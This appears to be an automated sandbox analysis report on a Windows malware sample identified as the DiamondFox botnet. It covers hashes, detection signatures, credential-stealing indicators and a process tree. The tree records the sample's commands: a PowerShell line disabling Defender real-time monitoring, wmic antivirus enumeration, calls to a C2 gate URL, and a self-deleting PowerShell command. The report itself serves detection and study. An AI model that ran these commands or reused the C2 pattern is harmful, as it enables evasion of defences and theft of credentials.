Analysis
-
max time kernel
133s -
max time network
164s -
platform
windows7_x64 -
resource
win7v20210410 -
submitted
04-07-2021 12:03
Static task
static1
Behavioral task
behavioral1
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win7v20210410
Behavioral task
behavioral2
Sample
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
Resource
win10v20210408
General
-
Target
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe
-
Size
203KB
-
MD5
a1e165e1926c0c83123c89fce6b1af56
-
SHA1
281246ba4b852a5f62e032424f7816f5a6b0406f
-
SHA256
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
-
SHA512
28e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
Malware Config
Signatures
-
DiamondFox
DiamondFox is a multipurpose botnet with many capabilities.
-
DiamondFox payload 18 IoCs
Detects DiamondFox payload in file/memory.
Processes:
resource yara_rule \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox \Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe diamondfox -
NirSoft MailPassView 3 IoCs
Password recovery tool for various email clients
Processes:
resource yara_rule behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView behavioral1/memory/976-152-0x000000000044412E-mapping.dmp MailPassView behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 3 IoCs
Password recovery tool for various web browsers
Processes:
resource yara_rule behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp WebBrowserPassView behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp WebBrowserPassView -
Nirsoft 8 IoCs
Processes:
resource yara_rule behavioral1/memory/836-134-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/836-135-0x00000000004466F4-mapping.dmp Nirsoft behavioral1/memory/836-138-0x0000000000400000-0x000000000047C000-memory.dmp Nirsoft behavioral1/memory/1596-146-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/1596-150-0x0000000000400000-0x0000000000422000-memory.dmp Nirsoft behavioral1/memory/976-151-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft behavioral1/memory/976-152-0x000000000044412E-mapping.dmp Nirsoft behavioral1/memory/976-155-0x0000000000400000-0x0000000000455000-memory.dmp Nirsoft -
Executes dropped EXE 10 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 316 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 2032 MicrosoftEdgeCPS.exe 1596 MicrosoftEdgeCPS.exe 976 MicrosoftEdgeCPS.exe 956 MicrosoftEdgeCPS.exe 540 MicrosoftEdgeCPS.exe 1776 MicrosoftEdgeCPS.exe 1500 MicrosoftEdgeCPS.exe 1148 MicrosoftEdgeCPS.exe -
Deletes itself 1 IoCs
Processes:
powershell.exepid process 1660 powershell.exe -
Loads dropped DLL 7 IoCs
Processes:
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exeWerFault.exepid process 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe 316 MicrosoftEdgeCPS.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Suspicious use of SetThreadContext 9 IoCs
Processes:
MicrosoftEdgeCPS.exedescription pid process target process PID 316 set thread context of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 976 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 956 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 540 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 1776 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 1500 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 set thread context of 1148 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 1 IoCs
Processes:
WerFault.exepid pid_target process target process 548 1148 WerFault.exe MicrosoftEdgeCPS.exe -
Opens file in notepad (likely ransom note) 1 IoCs
Processes:
notepad.exepid process 1636 notepad.exe -
Suspicious behavior: EnumeratesProcesses 15 IoCs
Processes:
powershell.exepowershell.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeWerFault.exepid process 1660 powershell.exe 1612 powershell.exe 1660 powershell.exe 1612 powershell.exe 316 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 836 MicrosoftEdgeCPS.exe 1148 MicrosoftEdgeCPS.exe 316 MicrosoftEdgeCPS.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 548 WerFault.exe 316 MicrosoftEdgeCPS.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
powershell.exepowershell.exewmic.exewmic.exedescription pid process Token: SeDebugPrivilege 1660 powershell.exe Token: SeDebugPrivilege 1612 powershell.exe Token: SeIncreaseQuotaPrivilege 288 wmic.exe Token: SeSecurityPrivilege 288 wmic.exe Token: SeTakeOwnershipPrivilege 288 wmic.exe Token: SeLoadDriverPrivilege 288 wmic.exe Token: SeSystemProfilePrivilege 288 wmic.exe Token: SeSystemtimePrivilege 288 wmic.exe Token: SeProfSingleProcessPrivilege 288 wmic.exe Token: SeIncBasePriorityPrivilege 288 wmic.exe Token: SeCreatePagefilePrivilege 288 wmic.exe Token: SeBackupPrivilege 288 wmic.exe Token: SeRestorePrivilege 288 wmic.exe Token: SeShutdownPrivilege 288 wmic.exe Token: SeDebugPrivilege 288 wmic.exe Token: SeSystemEnvironmentPrivilege 288 wmic.exe Token: SeRemoteShutdownPrivilege 288 wmic.exe Token: SeUndockPrivilege 288 wmic.exe Token: SeManageVolumePrivilege 288 wmic.exe Token: 33 288 wmic.exe Token: 34 288 wmic.exe Token: 35 288 wmic.exe Token: SeIncreaseQuotaPrivilege 288 wmic.exe Token: SeSecurityPrivilege 288 wmic.exe Token: SeTakeOwnershipPrivilege 288 wmic.exe Token: SeLoadDriverPrivilege 288 wmic.exe Token: SeSystemProfilePrivilege 288 wmic.exe Token: SeSystemtimePrivilege 288 wmic.exe Token: SeProfSingleProcessPrivilege 288 wmic.exe Token: SeIncBasePriorityPrivilege 288 wmic.exe Token: SeCreatePagefilePrivilege 288 wmic.exe Token: SeBackupPrivilege 288 wmic.exe Token: SeRestorePrivilege 288 wmic.exe Token: SeShutdownPrivilege 288 wmic.exe Token: SeDebugPrivilege 288 wmic.exe Token: SeSystemEnvironmentPrivilege 288 wmic.exe Token: SeRemoteShutdownPrivilege 288 wmic.exe Token: SeUndockPrivilege 288 wmic.exe Token: SeManageVolumePrivilege 288 wmic.exe Token: 33 288 wmic.exe Token: 34 288 wmic.exe Token: 35 288 wmic.exe Token: SeIncreaseQuotaPrivilege 1336 wmic.exe Token: SeSecurityPrivilege 1336 wmic.exe Token: SeTakeOwnershipPrivilege 1336 wmic.exe Token: SeLoadDriverPrivilege 1336 wmic.exe Token: SeSystemProfilePrivilege 1336 wmic.exe Token: SeSystemtimePrivilege 1336 wmic.exe Token: SeProfSingleProcessPrivilege 1336 wmic.exe Token: SeIncBasePriorityPrivilege 1336 wmic.exe Token: SeCreatePagefilePrivilege 1336 wmic.exe Token: SeBackupPrivilege 1336 wmic.exe Token: SeRestorePrivilege 1336 wmic.exe Token: SeShutdownPrivilege 1336 wmic.exe Token: SeDebugPrivilege 1336 wmic.exe Token: SeSystemEnvironmentPrivilege 1336 wmic.exe Token: SeRemoteShutdownPrivilege 1336 wmic.exe Token: SeUndockPrivilege 1336 wmic.exe Token: SeManageVolumePrivilege 1336 wmic.exe Token: 33 1336 wmic.exe Token: 34 1336 wmic.exe Token: 35 1336 wmic.exe Token: SeIncreaseQuotaPrivilege 1336 wmic.exe Token: SeSecurityPrivilege 1336 wmic.exe -
Suspicious use of SetWindowsHookEx 3 IoCs
Processes:
MicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exeMicrosoftEdgeCPS.exepid process 2032 MicrosoftEdgeCPS.exe 540 MicrosoftEdgeCPS.exe 1776 MicrosoftEdgeCPS.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exeMicrosoftEdgeCPS.exedescription pid process target process PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 1036 wrote to memory of 316 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe MicrosoftEdgeCPS.exe PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 1036 wrote to memory of 1660 1036 2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe powershell.exe PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe powershell.exe PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe powershell.exe PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe powershell.exe PID 316 wrote to memory of 1612 316 MicrosoftEdgeCPS.exe powershell.exe PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 288 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1336 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 756 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1348 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 332 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 960 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 1812 316 MicrosoftEdgeCPS.exe wmic.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 836 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 2032 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe PID 316 wrote to memory of 1596 316 MicrosoftEdgeCPS.exe MicrosoftEdgeCPS.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" Set-MpPreference -DisableRealtimeMonitoring 13⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" /Node:localhost /Namespace:\\root\SecurityCenter2 path AntiVirusProduct get DisplayName /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" os get caption /FORMAT:List3⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_VideoController get caption /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_NetworkAdapterConfiguration where IPEnabled=1 get IPAddress /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" LogicalDisk Where DriveType=4 get VolumeName /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\1.log"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\4.log"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\2.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe/scomma "C:\Users\Admin\AppData\Local\Temp\3.log"3⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Windows\notepad.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
- Opens file in notepad (likely ransom note)
-
C:\Windows\write.exeX C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exe4⤵
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeX http://diamond.serivice.com/panel/gate.php*Mozilla/5.0 (X11; Linux i686) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/87.0.4280.141 Safari/537.36 Vivaldi/3.5*f272b772399b50913c7637633c5ac5d83⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 1148 -s 2764⤵
- Loads dropped DLL
- Program crash
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get StatusCode /FORMAT:List3⤵
-
C:\Windows\SysWOW64\Wbem\wmic.exe"wmic" path win32_PingStatus where address='diamond.serivice.com' get ResponseTime /FORMAT:List3⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell" Start-Sleep -s 10; Remove-Item -Path 'C:\Users\Admin\AppData\Local\Temp\2d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215.exe' -Force -Recurse2⤵
- Deletes itself
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_1602f747-c1a3-4345-8dec-4dcb8b1f72e5MD5
02ff38ac870de39782aeee04d7b48231
SHA10390d39fa216c9b0ecdb38238304e518fb2b5095
SHA256fbd66a9baf753db31b8de23f2d51b67f8676687503653103080c45b16f1dc876
SHA51224a1ff76ee42ff7a5ea42843928c4df07b06178f7781cd840e1e086e88735d81506eb67259ff1e6ce5aaa7c5baea03886da265eb7e025ff4dc4c4b5f8cd3e341
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_2d686436-375c-4ee1-bd4a-9e44ccd248baMD5
75a8da7754349b38d64c87c938545b1b
SHA15c28c257d51f1c1587e29164cc03ea880c21b417
SHA256bf08151c174b5d00c9dbc7907b2c6a01b4be76bfa3afce1e8bd98a04ad833c96
SHA512798797bc74c56c874e9a5fdcb0157c04e37a1b3cce285ef064b01bceef8cec45f11a5198918c6c647220b62883606b5e12e3cca3ea369f3a66e69dea6e15f643
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_4375eeb7-a65d-43f1-a616-02c5ad6c5370MD5
be4d72095faf84233ac17b94744f7084
SHA1cc78ce5b9c57573bd214a8f423ee622b00ebb1ec
SHA256b0d72c5c22e57913476ac8fc686a4593f137c6667d5094522c0a0685dabd7adc
SHA51243856e9b1032b8690ceea810c931bed3655e9190414bb220fb6afc136f31b8335e07604dffb28405d4006f266a54cff424c527d29924b1b732c9647a3252b097
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_6fe5bd95-2cea-4aea-9c8c-dd67bac4295bMD5
df44874327d79bd75e4264cb8dc01811
SHA11396b06debed65ea93c24998d244edebd3c0209d
SHA25655de642c5c9e436ec01c57004dae797022442c3245daf7162d19a5585f221181
SHA51295dc9298b8db059bbe746f67e6a7f8515781c7053cc60c01532e47623a996be7e1bd23d1bd8f5f2045adff27454f44930d503c15b695690088841cedbd2a06c3
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_bc2fe8ee-69c0-48ce-8821-1fab80ab4eebMD5
597009ea0430a463753e0f5b1d1a249e
SHA14e38b8bb65ecbd5c9f0d3d8c47f7caba33de6c62
SHA2563fd2a8217a845c43dbc0dc206c28be81d2687aa9ba62019d905aef10cfaec45d
SHA5125d722fa908e64575b2497c60d142e182011a10c6ed33813b3b4796b3147ece1bc96938518b4c8911a1bac3b7560528ebe3e8e754c11015516d335df5d7c6871d
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fa12b0a1-3d6a-4bab-a74a-253a75ca0598MD5
5e3c7184a75d42dda1a83606a45001d8
SHA194ca15637721d88f30eb4b6220b805c5be0360ed
SHA2568278033a65d1ff48be4d86e11f87930d187692f59f8bf2f0a9d170de285afb59
SHA512fae99b6e9b106e0f1c30aa4082b25ae1ad643455c1295c2c16ad534e3e611b9b08492353ffe1af1cfdddc9b2b7c330747a64012c45e62b8f4a4982dcc214e05b
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fd9bf4da-ec38-4847-85c5-d50f35796d4cMD5
a725bb9fafcf91f3c6b7861a2bde6db2
SHA18bb5b83f3cc37ff1e5ea4f02acae38e72364c114
SHA25651651f27f54c7261887037aa1de4eff0a26c6807906dfc34a15cd5a0b58a8431
SHA5121c4b21dd5660bfec8347257bb3da64681b0a97c427790d9ab3484f687dac032bcff0e07876635953697b00cf83e7d37f97c44e0219627fd0533f60ed3024b97e
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheEntry_fe80cd26-0cf7-4e38-9884-6dab53b04ca9MD5
b6d38f250ccc9003dd70efd3b778117f
SHA1d5a17c02cac698d4f0a4a9b7d71db2aa19e3f18a
SHA2564de9d7b5ccab7b67ca8efc83084c7ee6e5e872b7216ed4683bc5da950bf41265
SHA51267d8195836b7f280d3f9219fd0f58276342e55d5dfdd8a4c54355030d96685d73f1b2b6da0eb39322ec7c3a1d1c5ef06b52d22646cea30a96f822de1800d31e9
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
f62bbfed41c59f5b42018522a3fecba9
SHA13fdfb455d148133e7bb440c7f5ceb033226942c6
SHA25672bef76fffeee9433e97763a04116aeaebbde45e9c3991673b9ff363f06bd246
SHA5123c21c5e5b26483c25e9e76f819b629b28f2770f94dcf83dfccf193b92cebf8076bc87aa47c7033d24999d8ec16c3401bd1a388e9bdaee86b48194568f03f66bb
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\CommandAnalysis\PowerShell_AnalysisCacheIndexMD5
78a92da2ceb4c14fc5c60439c573ba55
SHA1dad5c656f249002137b76f21dd7b6212cd6ba5c9
SHA256e50efb7600c7a6aa4533601e851ab96226f451c79ae0c5dce1af4c5ae1ef312b
SHA5121a96e11937a782bf04ed249c64028d0fcb9eb10e44e8a2a1aa52b3c748fac6c2704f6e6c426421a975886a78db97773119d7f56920a4e300173ccf98014b08b5
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
SHA51228e2081e6249378e7f81e46e8e4afc93828adca7cf51316e7060655a60b2ee90b6f22af0b45a23299368d821816a64bc9d02d18f69d296047604f51b12eba354
-
C:\Users\Admin\AppData\Roaming\EdgeCP\MicrosoftEdgeCPS.exeMD5
a1e165e1926c0c83123c89fce6b1af56
SHA1281246ba4b852a5f62e032424f7816f5a6b0406f
SHA2562d64df6be5fbabdd41d304644e18d6dcab3d1a889df58fa962111e1c76ad2215
